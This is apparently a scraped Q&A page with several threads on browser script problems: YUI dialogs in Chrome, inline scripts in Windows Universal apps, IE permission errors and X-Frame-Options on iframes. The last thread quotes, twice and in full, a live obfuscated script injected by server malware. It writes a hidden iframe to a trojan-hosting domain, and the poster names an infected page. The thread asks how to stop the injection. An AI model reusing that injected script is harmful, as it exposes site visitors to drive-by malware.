I try to insert JavaScript code to YAHOO.widget.Dialog.setBody(...), bit this does not work in Chrome (I have Ubuntu) (In Firefox the code is working)
The html file (simple example that not working in chrome browser):
<html>
<head>
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.2r1/build/container/assets/skins/sam/container.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.2r1/build/yahoo-dom-event/yahoo-dom-event.js&2.8.2r1/build/container/container-min.js"></script>
</head>
<body class="yui-skin-sam">
<script type="text/javascript">
previewDialog = new YAHOO.widget.Dialog("previewDialog", { width: "600px", visible: true});
previewDialog.setBody('<h2>h2 text h2'+'<script>'+'alert("alert text alert");'+'<'+'/script>'+'</h2>');
previewDialog.render(document.body);
</script>
</body>
</html>
How can be my code fixed for working in chrome?
(In real project I try to insert more complicated javascript code)
I don't have a solution, but I am having the same problem.
I opened up Google Chrome's built in developer console and see several warnings:
[blocked] The page at https://c.na15.visual.force.com/apex/SkillsMatrix?core.apexpages.devmode.url=1 ran insecure content from http://yui.yahooapis.com/combo?2.7.0/build/yahoo-dom-event/yahoo-dom-event.….0/build/animation/animation-min.js&2.7.0/build/container/container-min.js.
SkillsMatrix?core.apexpages.devmode.url=1:1
[blocked] The page at https://c.na15.visual.force.com/apex/SkillsMatrix?core.apexpages.devmode.url=1 ran insecure content from http://yui.yahooapis.com/combo?2.7.0/build/container/assets/skins/sam/container.css.
SkillsMatrix?core.apexpages.devmode.url=1:3
[blocked] The page at https://c.na15.visual.force.com/apex/SkillsMatrix?core.apexpages.devmode.url=1 ran insecure content from http://yui.yahooapis.com/combo?2.7.0/build/yahoo-dom-event/yahoo-dom-event.….0/build/animation/animation-min.js&2.7.0/build/container/container-min.js.
SkillsMatrix:1
[blocked] The page at https://c.na15.visual.force.com/apex/SkillsMatrix?core.apexpages.devmode.url=1 ran insecure content from http://yui.yahooapis.com/combo?2.7.0/build/container/assets/skins/sam/container.css.
I think the problem (at least for me) is that Chrome is most vigilantly enforcing a "Same Origin Policy" (cf. http://en.wikipedia.org/wiki/Same_origin_policy ).
The Force Times ( http://theforcetimes.wordpress.com/ ) currently writes about using an "AJAX Proxy" which may help to resolve some such issues. (His article is SFDC-centric but perhaps the principle will help if this is the problem you are having and you can establish your own proxy somewhere.)
It requires additional button-min.js and element-min.js with corresponding CSS as well.
Related
In a Visual Studio 2015 "Javascript universal Windows" application I have this very simple code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<!-- WinJS references -->
<link href="WinJS/css/ui-dark.css" rel="stylesheet" />
<script src="WinJS/js/base.js"></script>
<script src="WinJS/js/ui.js"></script>
<!-- aaaaa references -->
<link href="/css/default.css" rel="stylesheet" />
<script src="/js/default.js"></script>
</head>
<body class="win-type-body">
<div id="myDiv">BEFORE</div>
<script>
window.onload = function () {
document.getElementById("myDiv").innerHTML = "AFTER";
};
</script>
</body>
</html>
If I run the application, choosing "Local machine" or any Windows Phone emulator, I see "BEFORE": the line that changes the innerHtml of the div is not executed.
Otherwise, if I execute the html file outside of Visual Studio, in a browser window, I see "AFTER": this is true for all browsers, with a little exception in the behavior of Internet Explorer 11: in this case I see the message "Internet explorer restricted this web page from running scripts or activex controls", and when I click "allow the content" I see "AFTER".
Why this very simple script does not work in Visual Studio? Is it a matter of security restrictions, like in IE?
And why I don't see any message at all in Visual Studio about the issue?
How can I solve this problem in Visual Studio?
I've tested your code. It's true but you should write your code inside of javascript files. Just move window.onload at the begining of the default.js.
It's not really an error, that's why VS 2015 won't signal it.
The fact is that inline scripts are not allowed in Universal Apps because it is a common cause of CSS (cross-site scripting) attacks.
See the first of the Remarks at the end of the link to Microsoft documentation.
Some workarounds are discussed here.
One possible cause could be the code inside js script tags overwriting the window.onload method. You seem to be using a mix of relative and absolute paths in the script tag includes. So when running outside visual studio these files might not get included so the window.onload is not overwritten. Some steps to debug would be:
Check web developer console for errors, network errors etc. (From memory F12 in IE)
Remove all other script tags and test.
Try window.addEventListener("load", function{ }, false); instead of window.onload.
I have a very simple page that is loading 4 scripts.
jquery 2.0.3
jquery ui 1.10.3
knockout 3.0.0
knockout mapping 2.4.1
This only happens in IE. I have tried it in both 10 & 11;
I navigate to the url and the page loads fine. if I refresh the page still OK. If I go to the hit Enter in the address bar expecting it reload, it does but I get SCRIPT70: Permission denied errors, saying permission denied. Any ideas? Is this a local security settings policy with IE?
Here is the markup:
<html>
<head></head>
<body>TEST
<script src="/MyVirtualDir/Scripts/jquery-2.0.3.min.js"></script>
<script src="/MyVirtualDir/Scripts/jquery-ui-1.10.3.custom.min.js"></script>
<script src="/MyVirtualDir/Scripts/knockout-3.0.0.js"></script>
<script src="/MyVirtualDir/Scripts/knockout.mapping-2.4.1.js"></script>
</body>
</html>
I am not sure if this will help but this worked for me in IE10
Here's something to try:
Make sure that HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_OBJECT_CACHING\iexplore.exe is not set to 0 (it should be 1 or missing)
Reference: http://forum.jquery.com/topic/strange-behaviour-in-ie9
I don't think it has anything to do with jquery/js
Or Try this: Tools>Internet Options>Security tab, click "Reset all zones to default"
This code is working in Dreamweaver default browser but not in chrome or firefox. It shows only blank page , without showing google.com. Don't know why! May be the problem is with iFrame. But I have to show something other page in my page. Is there any workaround??
<!DOCTYPE html>
<html>
<head>
<title>booo yeah</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js" ></script>
<script type="text/javascript">
$(document).ready(function() {
var height = $(window).height();
var width = $(window).width();
$('iframe').width(width);
$('iframe').height(height);
});
</script>
</head>
<body>
<iframe src="http://www.google.com" frameBorder="0"></iframe>
</body>
</html>
Screenshot:http://goo.gl/jTpB2g
On back there is dreamweaver with left side code and right side its default browser showing the working code. In front, there is chrome in which nothing is showing
The website you are trying to display has security that prevents it from being used in iframe. for example <iframe src="http://www.w3schools.com"></iframe> works fine. The problem is not with your browser.
Open you console panel and you can see an error message says:
Refused to display 'https://www.google.com/' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
Google search returns an X-Frame-Options header with SAMEORIGIN, that meas this page can only be displayed in a frame on the same origin as the page itself.
See more from X-Frame-Options
Solutions:
If you have access to the site, try set X-Frame-Options to ALLOWALL or simply remove this from http response.
If you are stuck at google, try use Google Custom Search instead, replace your url with this http://www.google.com/custom, which sends 'X-Frame-Options: ALLOWALL ' which allows you to embed this site in your IFRAME.
It's probably not displaying for security reasons.
Same Origin Policy
The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0.
Some websites do allow it but Google doesn't. Strange that it's ok with Dreamweaver doing it.
There are ways you can circumvent it (I can't say they'll be suitable for your problem though).
Ways to circumvent the same-origin policy
As ajtrichards said, Google has restrictions due to Same Origin Policy.
Just try another domain you will see that your code works
jsbin.com/UJeHaqe/1/edit
The following is a snippit from my a little web page I'm putting together.
<script type="text/javascript" src="head.js">
</script>
<title>CPST 3410-85 Class Template</title>
</head>
<body onload="outputToDiv();">
The head.js file referenced in the script tag is below:
function outputToDiv() {
alert("JavaScript is working!");
}
In Chrome and in Firefox the alert is displayed indicating the JavaScript is working. In IE9 it is not. Furtermore I can't get ANY external script to run in IE9, regardless of the content. I have used custom security settings and lowered in a granular way every security setting to its lowest level, and gone into advanced settings and enabled literally everything I could find.
It should be noted that I am opening this from a local folder. All files are in the same folder, and again I stress that this works in firefox and chrome.
In IE9 I have enabled debugging and I get the error below:
Webpage error details
Message: Invalid character
Line: 1
Char: 1
Code: 0
URI: file:///E:/My%20Documents/My%20Web%20Sites/CPST341085/head.js
Of course it then tells me that "outputToDiv()" is undefined.
I am at a total loss here.
I got this behavior when I had:
<script type="text/javascript" src="jquery-1.7.1.js" />
However, this fixed it:
<script type="text/javascript" src="jquery-1.7.1.js"></script>
Go figure...
David
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
The file that is in your server is a php file look in the comments here.
Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.
You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).
It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.
Best of luck with the server!